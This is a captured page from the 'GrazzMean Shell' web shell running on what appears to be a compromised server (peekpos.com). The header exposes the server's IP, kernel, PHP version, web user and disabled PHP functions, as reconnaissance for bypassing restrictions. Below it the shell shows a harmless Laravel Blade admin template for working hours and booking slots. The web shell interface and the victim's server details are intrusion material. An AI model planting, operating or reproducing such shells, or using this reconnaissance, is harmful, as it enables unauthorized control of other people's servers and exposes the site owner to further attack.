shell bypass 403

GrazzMean Shell

Uname: Linux peekpos.com 6.8.0-1060-aws #63~22.04.1-Ubuntu SMP Tue Jun 30 02:32:53 UTC 2026 x86_64
Software: Apache
PHP version: 8.3.25 [ PHP INFO ] PHP os: Linux
Server Ip: 47.130.192.226
Your Ip: 10.1.31.86
User: www (1001) | Group: www (1001)
Safe Mode: OFF
Disable Function:
passthru,putenv,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

name : time.blade.php
@extends('admin.theme.default')
<link rel="stylesheet"
    href="{{ url(env('ASSETSPATHURL') . 'admin-assets/assets/css/timepicker/jquery.timepicker.min.css') }}">
@section('content')
    @include('admin.breadcrumb')
    <div class="container-fluid">
        <div class="row mb-3">
            <div class="col-lg-12">
                <div class="card border-0 box-shadow">
                    <div class="card-body">
                        <div class="basic-form">
                            <form action="{{ URL::to('admin/time/store') }}" method="post">
                                @csrf
                                <div class=" border-bottom pb-3">
                                    <div class="row g-3">
                                        <div class="col-md-4 mb-lg-0">
                                            <div class="form-group">
                                                <label class="form-label">{{ trans('labels.time_interval') }}<span
                                                        class="text-danger"> *
                                                    </span></label>
                                                <div class="input-group">
                                                    <input type="text"
                                                        class="form-control {{ session()->get('direction') == 2 ? 'input-group-rtl' : '' }} numbers_only"
                                                        name="interval_time"
                                                        placeholder="{{ trans('labels.time_interval') }}"
                                                        aria-describedby="button-addon2"
                                                        value="{{ $settingsdata->interval_time }}" required>
                                                    <select name="interval_type"
                                                        class="border border-muted {{ session()->get('direction') == 2 ? 'rounded-start' : 'rounded-end' }}"
                                                        id="">
                                                        <option value="1"
                                                            {{ $settingsdata->interval_type == 1 ? 'selected' : '' }}>
                                                            {{ trans('labels.minute') }}
                                                        </option>
                                                        <option value="2"
                                                            {{ $settingsdata->interval_type == 2 ? 'selected' : '' }}>
                                                            {{ trans('labels.hour') }}
                                                        </option>
                                                    </select>
                                                </div>
                                                @error('interval_time')
                                                    <small class="text-danger">{{ $message }}</small>
                                                @enderror
                                            </div>
                                        </div>
                                        <div class="col-md-4 mb-lg-0">
                                            <div class="form-group">
                                                <label class="form-label">{{ trans('labels.perslot_booking_limit') }}<span
                                                        class="text-danger">
                                                        * </span></label>
                                                <input type="number" class="form-control" name="slot_limit"
                                                    placeholder="{{ trans('labels.perslot_booking_limit') }}"
                                                    aria-describedby="button-addon2"
                                                    value="{{ $settingsdata->perslot_booking_limit }}" required>
                                                @error('slot_limit')
                                                    <small class="text-danger">{{ $message }}</small>
                                                @enderror
                                            </div>
                                        </div>
                                        <div class="col-md-4 form-group">
                                            <label class="form-label" for="">{{ trans('labels.date_time') }}
                                            </label>
                                            <input id="ordertypedatetime-switch" type="checkbox" class="checkbox-switch"
                                                name="ordertypedatetime" value="1"
                                                {{ $settingsdata->ordertype_date_time == 1 ? 'checked' : '' }}>
                                            <label for="ordertypedatetime-switch" class="switch">
                                                <span
                                                    class="{{ session()->get('direction') == 2 ? 'switch__circle-rtl' : 'switch__circle' }}"><span
                                                        class="switch__circle-inner"></span></span>
                                                <span
                                                    class="switch__left {{ session()->get('direction') == 2 ? 'pe-2' : 'ps-2' }}">{{ trans('labels.off') }}</span>
                                                <span
                                                    class="switch__right {{ session()->get('direction') == 2 ? 'ps-2' : 'pe-2' }}">{{ trans('labels.on') }}</span>
                                            </label>
                                        </div>

                                    </div>
                                </div>
                                <div class="row g-3 my-2">
                                    <label class="col-md-2 form-label d-none d-lg-block"></label>
                                    <label
                                        class="col-md-2 text-center form-label d-none d-lg-block d-xl-block d-xxl-block">{{ trans('labels.opening_time') }}</label>
                                    <label
                                        class="col-md-2 text-center form-label d-none d-lg-block d-xl-block d-xxl-block">{{ trans('labels.break_start') }}</label>
                                    <label
                                        class="col-md-2 text-center form-label d-none d-lg-block d-xl-block d-xxl-block">{{ trans('labels.break_end') }}</label>
                                    <label
                                        class="col-md-2 text-center form-label d-none d-lg-block d-xl-block d-xxl-block">{{ trans('labels.closing_time') }}</label>
                                    <label
                                        class="col-md-2 text-center form-label d-none d-lg-block d-xl-block d-xxl-block">{{ trans('labels.is_closed') }}</label>
                                </div>
                                @foreach ($gettime as $key => $time)
                                    <div class="row g-3 mb-2">
                                        <label class="col-md-2 form-label"> <strong>
                                                {{ trans('labels.' . strtolower($time->day)) }} </strong> </label>
                                        <input type="hidden" name="day[]" value="{{ strtolower($time->day) }}">
                                        @if ($time->always_close == '2')
                                            <div class="form-group col-md-2 d-grid align-items-end">
                                                <label
                                                    class="d-lg-none d-xl-none d-xxl-none form-label">{{ trans('labels.opening_time') }}</label>
                                                <input type="text"
                                                    class="form-control h-fit-content timepicker {{ $errors->has('open_time.' . $key) ? 'is-invalid' : '' }}"
                                                    placeholder="{{ trans('labels.opening_time') }}" name="open_time[]"
                                                    value="{{ $time->open_time }}" required>
                                            </div>
                                            <div class="form-group col-md-2 d-grid align-items-end">
                                                <label
                                                    class="d-lg-none d-xl-none d-xxl-none form-label">{{ trans('labels.break_start') }}</label>
                                                <input type="text"
                                                    class="form-control h-fit-content timepicker {{ $errors->has('break_start.' . $key) ? 'is-invalid' : '' }}"
                                                    placeholder="{{ trans('labels.break_start') }}" name="break_start[]"
                                                    value="{{ $time->break_start }}" required>
                                            </div>
                                            <div class="form-group col-md-2 d-grid align-items-end">
                                                <label
                                                    class="d-lg-none d-xl-none d-xxl-none form-label">{{ trans('labels.break_end') }}</label>
                                                <input type="text"
                                                    class="form-control h-fit-content timepicker {{ $errors->has('break_end.' . $key) ? 'is-invalid' : '' }}"
                                                    placeholder="{{ trans('labels.break_end') }}" name="break_end[]"
                                                    value="{{ $time->break_end }}" required>
                                            </div>
                                            <div class="form-group col-md-2 d-grid align-items-end">
                                                <label
                                                    class="d-lg-none d-xl-none d-xxl-none form-label">{{ trans('labels.closing_time') }}</label>
                                                <input type="text"
                                                    class="form-control h-fit-content timepicker {{ $errors->has('close_time.' . $key) ? 'is-invalid' : '' }}"
                                                    placeholder="{{ trans('labels.closing_time') }}" name="close_time[]"
                                                    value="{{ $time->close_time }}" required>
                                            </div>
                                        @else
                                            <div class="form-group col-md-2 d-grid align-items-end">
                                                <label
                                                    class="d-lg-none d-xl-none d-xxl-none form-label">{{ trans('labels.opening_time') }}</label>
                                                <input type="text"
                                                    class="form-control h-fit-content {{ $errors->has('open_time.' . $key) ? 'is-invalid' : '' }}"
                                                    placeholder="{{ trans('labels.opening_time') }}" name="open_time[]"
                                                    value="closed" readonly="" required>
                                            </div>
                                            <div class="form-group col-md-2 d-grid align-items-end">
                                                <label
                                                    class="d-lg-none d-xl-none d-xxl-none form-label">{{ trans('labels.break_start') }}</label>
                                                <input type="text"
                                                    class="form-control h-fit-content {{ $errors->has('break_start.' . $key) ? 'is-invalid' : '' }}"
                                                    placeholder="{{ trans('labels.break_start') }}" name="break_start[]"
                                                    value="closed" readonly="" required>
                                            </div>
                                            <div class="form-group col-md-2 d-grid align-items-end">
                                                <label
                                                    class="d-lg-none d-xl-none d-xxl-none form-label">{{ trans('labels.break_end') }}</label>
                                                <input type="text"
                                                    class="form-control h-fit-content {{ $errors->has('break_end.' . $key) ? 'is-invalid' : '' }}"
                                                    placeholder="{{ trans('labels.break_end') }}" name="break_end[]"
                                                    value="closed" readonly="" required>
                                            </div>
                                            <div class="form-group col-md-2 d-grid align-items-end">
                                                <label
                                                    class="d-lg-none d-xl-none d-xxl-none form-label">{{ trans('labels.closing_time') }}</label>
                                                <input type="text"
                                                    class="form-control h-fit-content {{ $errors->has('close_time.' . $key) ? 'is-invalid' : '' }}"
                                                    placeholder="{{ trans('labels.closing_time') }}" name="close_time[]"
                                                    value="closed" readonly="" required>
                                            </div>
                                        @endif
                                        <div class="form-group col-md-2">
                                            <label
                                                class="d-lg-none d-xl-none d-xxl-none form-label">{{ trans('labels.is_closed') }}</label>
                                            <select
                                                class="form-select fs-7 h-fit-content {{ $errors->has('always_close.' . $key) ? 'is-invalid' : '' }}"
                                                name="always_close[]" required>
                                                <option value="" selected disabled>{{ trans('labels.select') }}
                                                </option>
                                                <option value="1" @if ($time->always_close == '1') selected @endif>
                                                    {{ trans('labels.yes') }}</option>
                                                <option value="2" @if ($time->always_close == '2') selected @endif>
                                                    {{ trans('labels.no') }}</option>
                                            </select>
                                        </div>
                                    </div>
                                @endforeach
                                <div
                                    class="form-grou mt-3 {{ session()->get('direction') == 2 ? ' text-start' : ' text-end' }}">
                                    <button
                                        class="btn btn-primary px-4 {{ Auth::user()->type == 4 ? (helper::check_access('role_working_hours', Auth::user()->role_id, 'edit') == 1 ? '' : 'd-none') : '' }}"
                                        @if (env('Environment') == 'sendbox') type="button" onclick="myFunction()" @else type="submit" @endif>{{ trans('labels.save') }}</button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
@endsection
@section('script')
    <script src="{{ url(env('ASSETSPATHURL') . 'admin-assets/assets/js/timepicker/jquery.timepicker.min.js') }}"></script>
    <script>
        $(document).ready(function() {
            $(".timepicker").timepicker();
        });
    </script>
@endsection
© 2026 GrazzMean